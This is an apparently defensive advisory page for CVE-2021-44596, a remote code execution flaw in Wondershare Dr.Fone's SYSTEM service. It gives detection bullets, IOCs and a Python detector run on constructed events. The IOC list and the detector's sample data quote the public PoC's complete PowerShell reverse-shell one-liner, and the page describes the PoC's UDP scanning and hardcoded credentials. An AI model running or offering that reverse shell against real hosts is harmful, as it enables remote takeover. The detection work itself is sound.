CVE-2021-44596
published 2022-04-29


Priority: P180 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: public PoC available
EPSS: 22.72% (97.4th percentile)
Wondershare LTD Dr. Fone, as of the 2021-12-06 version, is affected by remote code execution. Because of a software design flaw, an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service (which runs with SYSTEM privileges) and make it execute an attacker-supplied executable from a remote location without any validation, thereby gaining SYSTEM privileges.

Affected (1 range)

Vendor       Product   Version range   Fixed in
wondershare  dr.fone   (not listed)    (not listed)

Detection & IOCs (extracted from sources)

filename: InstallAssistService.exe
url: https://download.wondershare.net/drfone_full4008.exe
process: WindowsPowerShell\v1.0\powershell.exe
command: powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.14.129',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
port: UDP/1024-65499 (range scanned by the PoC to locate InstallAssistService.exe)
port: TCP/1337 (reverse shell listener)
  • Detect UDP traffic to InstallAssistService.exe anywhere in the 1024–65499 range: the public PoC does not know which port the service is listening on and sends its payload to every UDP port in that range, so a burst of UDP datagrams from one source across many ports on a Dr.Fone host is itself a signal. The service accepts these packets with no authentication.
  • Alert on InstallAssistService.exe spawning powershell.exe as a child process (especially with the -nop flag); this indicates successful exploitation, since the service has no legitimate reason to launch an interactive shell.
  • Detect the PowerShell reverse-shell pattern: New-Object System.Net.Sockets.TCPClient combined with iex (Invoke-Expression), launched by a SYSTEM-privileged, non-interactive service process.
  • The PoC embeds hardcoded credentials ('Admin' / '12345') in the UDP message body; inspect UDP payloads destined for InstallAssistService.exe for these credential strings followed by an executable path.
  • Monitor outbound TCP connections on port 1337 originating from InstallAssistService.exe or its child processes, consistent with the reverse-shell callback. Note that 1337 is simply the argument in the PoC one-liner; an attacker can pick any port, so the stronger rule is any outbound connection from the service's process tree.
  • The exploit targets Wondershare Dr.Fone versions up to 12.0.7; the vulnerable service (InstallAssistService.exe) runs with SYSTEM privileges and performs no authentication on its UDP interface, so any host running an affected version is remotely exploitable without credentials.
  • The PoC uses lab-specific example IPs (192.168.14.129 for the C2 listener, 192.168.14.137 for the target); do not use them as static IOCs in production detections.
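As an added example (not code from the advisory, the PoC, or Wondershare), the detection logic from the bullets above, run over constructed Sysmon-style process-creation and network-connection events. The event field names, the install path, the PIDs and the benign events are assumptions made for illustration; the malicious command line is the PoC one-liner listed above. The rules are deliberately a little more general than the bullets: the reverse-shell check keys on the TCPClient/iex/GetStream building blocks rather than on the lab IP and port, and the outbound-connection rule covers any TCP port initiated from the service's process tree, not only 1337.

```python
"""Host-based detector for the CVE-2021-44596 post-exploitation chain.

Added example; not from the advisory, the PoC, or the vendor. Event shape,
install path, PIDs and benign events are constructed assumptions.
"""
import re
from dataclasses import dataclass

VULN_SERVICE = "installassistservice.exe"

# Building blocks of the PoC one-liner, matched independently and
# case-insensitively so reordering or re-quoting does not evade the rule.
REVSHELL_PATTERNS = [
    re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    re.compile(r"\biex\b|Invoke-Expression", re.I),
    re.compile(r"\.GetStream\(\)", re.I),
]
NOPROFILE = re.compile(r"(^|\s)-nop(rofile)?\b", re.I)


@dataclass
class ProcessEvent:          # Sysmon Event ID 1-like fields (assumed names)
    pid: int
    ppid: int
    image: str
    parent_image: str
    user: str
    command_line: str


@dataclass
class NetworkEvent:          # Sysmon Event ID 3-like fields (assumed names)
    pid: int
    image: str
    dest_ip: str
    dest_port: int
    protocol: str
    initiated: bool          # True for outbound connections


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def reverse_shell_score(command_line: str) -> int:
    """Number of reverse-shell building blocks present in a command line."""
    return sum(1 for p in REVSHELL_PATTERNS if p.search(command_line))


def service_process_tree(events) -> set:
    """PIDs of the vulnerable service and everything it transitively spawned."""
    tainted = {
        e.pid for e in events
        if basename(e.image) == VULN_SERVICE or basename(e.parent_image) == VULN_SERVICE
    }
    changed = True
    while changed:  # propagate down the tree until no new descendants appear
        changed = False
        for e in events:
            if e.pid not in tainted and e.ppid in tainted:
                tainted.add(e.pid)
                changed = True
    return tainted


def detect(process_events, network_events):
    """Return (severity, rule, pid) tuples for every suspicious event."""
    alerts = []
    for e in process_events:
        child, parent = basename(e.image), basename(e.parent_image)
        if parent == VULN_SERVICE and child == "powershell.exe":
            severity = "critical" if NOPROFILE.search(e.command_line) else "high"
            alerts.append((severity, "InstallAssistService.exe spawned powershell.exe", e.pid))
        if child == "powershell.exe" and reverse_shell_score(e.command_line) >= 2:
            alerts.append(("critical", "PowerShell TCPClient+iex reverse-shell pattern", e.pid))
    tree = service_process_tree(process_events)
    for n in network_events:
        if n.initiated and n.protocol.lower() == "tcp" and n.pid in tree:
            alerts.append(("high", f"outbound TCP to {n.dest_ip}:{n.dest_port} from service tree", n.pid))
    return alerts


# The PoC one-liner from the IOC list (verbatim); everything else is constructed.
POC_CMD = ('powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('
           "'192.168.14.129',1337);$stream = $client.GetStream();"
           '[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)'
           '{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);'
           "$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
           '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);'
           '$stream.Flush()};$client.Close()"')

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SVC_IMAGE = r"C:\Program Files\Wondershare\InstallAssistService.exe"   # assumed install path

SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(900, 4, SVC_IMAGE, r"C:\Windows\System32\services.exe",
                 r"NT AUTHORITY\SYSTEM", "InstallAssistService.exe"),
    ProcessEvent(2100, 900, PS_IMAGE, SVC_IMAGE, r"NT AUTHORITY\SYSTEM", POC_CMD),
    ProcessEvent(3100, 1500, PS_IMAGE, r"C:\Windows\explorer.exe",
                 r"LAB\alice", "powershell.exe -c Get-Process"),            # benign user shell
    ProcessEvent(2200, 2100, r"C:\Windows\System32\whoami.exe", PS_IMAGE,
                 r"NT AUTHORITY\SYSTEM", "whoami"),                          # spawned by the shell
]
SAMPLE_NETWORK_EVENTS = [
    NetworkEvent(2100, "powershell.exe", "192.168.14.129", 1337, "tcp", True),
    NetworkEvent(3100, "powershell.exe", "93.184.216.34", 443, "tcp", True),  # benign
]

if __name__ == "__main__":
    for severity, rule, pid in detect(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS):
        print(f"[{severity}] pid={pid}: {rule}")
```

Against the constructed sample, only PID 2100 is flagged: once for being a powershell.exe child of the service with -nop, once for the reverse-shell pattern, and once for its outbound TCP connection; the user's benign PowerShell session and its HTTPS connection produce nothing. The threshold of two building blocks in `reverse_shell_score` is the knob to tune if you see legitimate scripts that open sockets without evaluating received data.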

CVSS provenance

NVD v3.1: 9.8 CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 10.0 CRITICAL  AV:N/AC:L/Au:N/C:C/I:C/A:C